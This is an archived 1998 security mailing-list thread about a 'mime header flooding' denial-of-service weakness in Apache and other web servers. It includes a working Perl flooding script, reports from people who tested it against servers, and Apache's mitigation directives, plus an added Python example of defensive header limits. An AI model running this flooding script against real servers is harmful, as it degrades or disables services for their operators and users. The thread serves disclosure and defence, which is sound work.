TUCoPS :: Web :: General :: mimeflod.txt

Many web servers can be made to consume large amounts of CPU and memory by a client that floods them with MIME request headers.


[ http://www.rootshell.com/ ]

Date:         Thu, 3 Sep 1998 12:34:22 +0200
From:         Laurent FACQ <facq@U-BORDEAUX.FR>
Subject:      Web servers / possible DOS Attack / mime header flooding

#! /bin/perl

# mimeflood.pl - 02/08/1998 - L.Facq (facq@u-bordeaux.fr)

# Web servers / possible DOS Attack / "mime header flooding"
#
#       looking at the apache 1.2.5 source code i found
#       that there was no limit on how many mime headers could
#       be included in a client request. The only limits
#       are : 8192 byte for each header, 300 sec. on reading headers.
#
#       => by sending a crazy amount of 8000 bytes headers, it's possible
#       to consume a lot of memory (and of course CPU). The point
#       is that httpd daemons grow and STAY at this big size (or die
#       if you send too much)
#
#       -> maybe a limit on mime header number could be added.
#
#       -> maybe other web servers could be vulnerable to this problem.
#
#       - I tried on an apache 1.2.5 -> it works
#       - I didn't install 1.3.1 but looking at the source code,
#       I think the problem is there too.
#
##################################################
#From Roy T. Fielding / Sep 2 '98 at 12:57 pm -420
#
#[...]
#>
#>       -> maybe a limit on mime header number could be added.
#
#Such limits have already been added to 1.3.2-dev.
#
#.....Roy

use Socket;

# Usage : $0 host [port [max] ]
$max= 0;
if ($ARGV[2])
{
    $max= $ARGV[2];
}

$proto = getprotobyname('tcp');
socket(Socket_Handle, PF_INET, SOCK_STREAM, $proto);
$port = 80;
if ($ARGV[1])
{
    $port= $ARGV[1];
}
$host = $ARGV[0];
$sin = sockaddr_in($port,inet_aton($host));

connect(Socket_Handle,$sin);
send Socket_Handle,"GET / HTTP/1.0\n",0;
$val= ('z'x8000)."\n";
$n= 1;
$|= 1;
while (Socket_Handle)
{
    send Socket_Handle,"Stupidheader$n: ",0;
    send Socket_Handle,$val,0;
    $n++;
    if (!($n % 100))
    {
        print "$n\n";
    }

    if ($max && ($n > $max))
    {
        last;
    }
}
print "Done: $n\n";
send Socket_Handle,"\n",0;

while (<Socket_Handle>)
{
    print $_;
}

--------------------------------------------------------------------------

Date:         Thu, 3 Sep 1998 15:58:55 -0400
From:         Vanja Hrustic <vanja@SIAMRELAY.COM>
Subject:      Re: Web servers / possible DOS Attack / mime header flooding

At 12:34 03/09/98 +0200, Laurent FACQ wrote:
>#       => by sending a crazy amount of 8000 bytes headers, it's possible
>#       to consume a lot of memory (and of course CPU). The point
>#       is that httpd daemons grow and STAY at this big size (or die
>#       if you send too much)

After 2000 headers, 1.3.1 was consuming 93% and stayed there (other
processes were consuming 7%). Script dies after 2800 and Apache goes back
to 0.05%. Couldn't crash it.

Tested on HP-UX 10.20 / Apache 1.3.1.


Vanja Hrustic
Information Systems Manager
Siam Relay Ltd.
http://www.siamrelay.com
vanja@siamrelay.com
Phone: +662-616-8628
Fax  : +662-272-6516

--------------------------------------------------------------------------

Date:         Thu, 3 Sep 1998 21:49:19 +0100
From:         Rich Wood <rich@DYNAMITE.ORG>
Subject:      Re: Web servers / possible DOS Attack / mime header flooding

On 3 Sep 98, at 12:34, Laurent FACQ wrote:
> #       => by sending a crazy amount of 8000 bytes headers, it's possible
> #       to consume a lot of memory (and of course CPU). The point
> #       is that httpd daemons grow and STAY at this big size (or die
> #       if you send too much)

Tried against apache 1.3.1 on FreeBSD 2.2.6 (DX2-66 16Mb), script hung
after 2500 headers with apache using 30Mb.

Tried against apache 1.3.1 on NT4 (workstation) SP3 (P200 64Mb), after
7500 headers, apache was using 120Mb RAM and the box ground to a halt.

It didn't actually crash apache on either box, but severely reduced the
usefulness of the systems.

Rich
--
Rich Wood
rich@dynamite.org

--------------------------------------------------------------------------

Date:         Fri, 4 Sep 1998 00:00:26 +0200
From:         Lars Eilebrecht <lars@APACHE.ORG>
Subject:      Re: Web servers / possible DOS Attack / mime header flooding

According to Laurent FACQ:

> # mimeflood.pl - 02/08/1998 - L.Facq (facq@u-bordeaux.fr)

This is generally a variant of the recently posted
Sioux DoS attack and if you have applied the patch
posted by Ben Laurie this 'mimeflood' script won't
harm your server in any way.

FYI, the next version of Apache will include the following new directives:

 - LimitRequestLine: limits the size of the request line
 - LimitRequestFields: limits the number of header lines
 - LimitRequestFieldsize: limits the size of each header line
 - LimitRequestBody: limits the size of the entity-body

Sensible default values are used if the directives are unset
which will prevent the server from being flooded with bogus requests...

[...]
> ##################################################
> #From Roy T. Fielding / Sep 2 '98 at 12:57 pm -420
> #
> #[...]
> #>
> #>       -> maybe a limit on mime header number could be added.
> #
> #Such limits have already been added to 1.3.2-dev.
> #
> #.....Roy

Redistributing private email is considered to be very rude... or do you
have the permission from Roy to post his message?


Regards...
--
Lars Eilebrecht
sfx@unix-ag.org
lars@apache.org
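
The limits listed in the message above, sketched as an added Python example (not part of the original thread and not Apache's code): a request-head reader that stops buffering as soon as a line-size or field-count limit is crossed. The constants are named after the directives; their values, the function names and the 414/431 status codes are assumptions of this example.

```python
import io

# Limit names follow the directives listed above; the values are assumptions
# picked for this example, not settings quoted in the thread.
LIMIT_REQUEST_LINE = 8190
LIMIT_REQUEST_FIELDS = 100
LIMIT_REQUEST_FIELDSIZE = 8190

class RequestRejected(Exception):
    def __init__(self, status, reason):
        super().__init__(f"{status} {reason}")
        self.status = status

def read_bounded_line(stream, limit, status):
    """Read one line while buffering at most limit + 2 bytes (content + CRLF)."""
    raw = stream.readline(limit + 2)
    line = raw.rstrip(b"\r\n")
    if not raw.endswith(b"\n") or len(line) > limit:
        raise RequestRejected(status, "line too long or unterminated")
    return line

def read_request_head(stream):
    """Return (request_line, headers); reject as soon as any limit is crossed."""
    request_line = read_bounded_line(stream, LIMIT_REQUEST_LINE, 414)
    headers = []
    while True:
        line = read_bounded_line(stream, LIMIT_REQUEST_FIELDSIZE, 431)
        if not line:                      # blank line ends the header block
            return request_line, headers
        if len(headers) >= LIMIT_REQUEST_FIELDS:
            raise RequestRejected(431, "too many header fields")
        name, sep, value = line.partition(b":")
        if not sep or not name.strip():
            raise RequestRejected(400, "malformed header field")
        headers.append((name.strip().lower(), value.strip()))

def demo_flood(count=1000, size=8000):
    """Feed a constructed in-memory request with many large headers."""
    body = b"".join(b"X-Filler-%d: " % n + b"z" * size + b"\n" for n in range(count))
    stream = io.BytesIO(b"GET / HTTP/1.0\n" + body + b"\n")
    try:
        read_request_head(stream)
    except RequestRejected as exc:
        return exc.status, stream.tell()  # status and bytes read before rejection
    return 200, stream.tell()

if __name__ == "__main__":
    print(demo_flood())
```

With these values the per-connection buffer is capped at roughly LIMIT_REQUEST_FIELDS x LIMIT_REQUEST_FIELDSIZE bytes, however many headers the client keeps sending.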

--------------------------------------------------------------------------

Date:         Thu, 3 Sep 1998 14:51:42 -0700
From:         Daniel Leeds <dleeds@DFACADES.COM>
Subject:      Re: Web servers / possible DOS Attack / mime header flooding

IIS on NT 4.0 sp3, and the stock windows 98 http server appear to be immune.

However, some other 3rd party products appear vulnerable.

UnityMail 2.0 for 95/NT *IS* vulnerable to the DOS.  CPU load forks to 100%,
the system is useable, however all access to the UnityMail administrative
web server is hung.

The above is probably not a huge deal, other than annoying mailing list
admins who want to access their lists via the web admin, but I think it's
probably illustrative of a wider scope---> how many other administrative web
interfaces, commercial http servers, etc are vulnerable to this denial of
service?


On 03-Sep-98
Rich Wood wrote:
> On 3 Sep 98, at 12:34, Laurent FACQ wrote:
>> #       => by sending a crazy amount of 8000 bytes headers, it's possible
>> #       to consume a lot of memory (and of course CPU). The point
>> #       is that httpd daemons grow and STAY at this big size (or die
>> #       if you send too much)
>
> Tried against apache 1.3.1 on FreeBSD 2.2.6 (DX2-66 16Mb), script hung
> after 2500 headers with apache using 30Mb.
>
> Tried against apache 1.3.1 on NT4 (workstation) SP3 (P200 64Mb), after
> 7500 headers, apache was using 120Mb RAM and the box ground to a halt.
>
> It didn't actually crash apache on either box, but severely reduced the
> usefulness of the systems.
>
> Rich
> --
> Rich Wood



-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Daniel Leeds                          Systems Administrator
dleeds@dfacades.com                          DigitalFacades
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

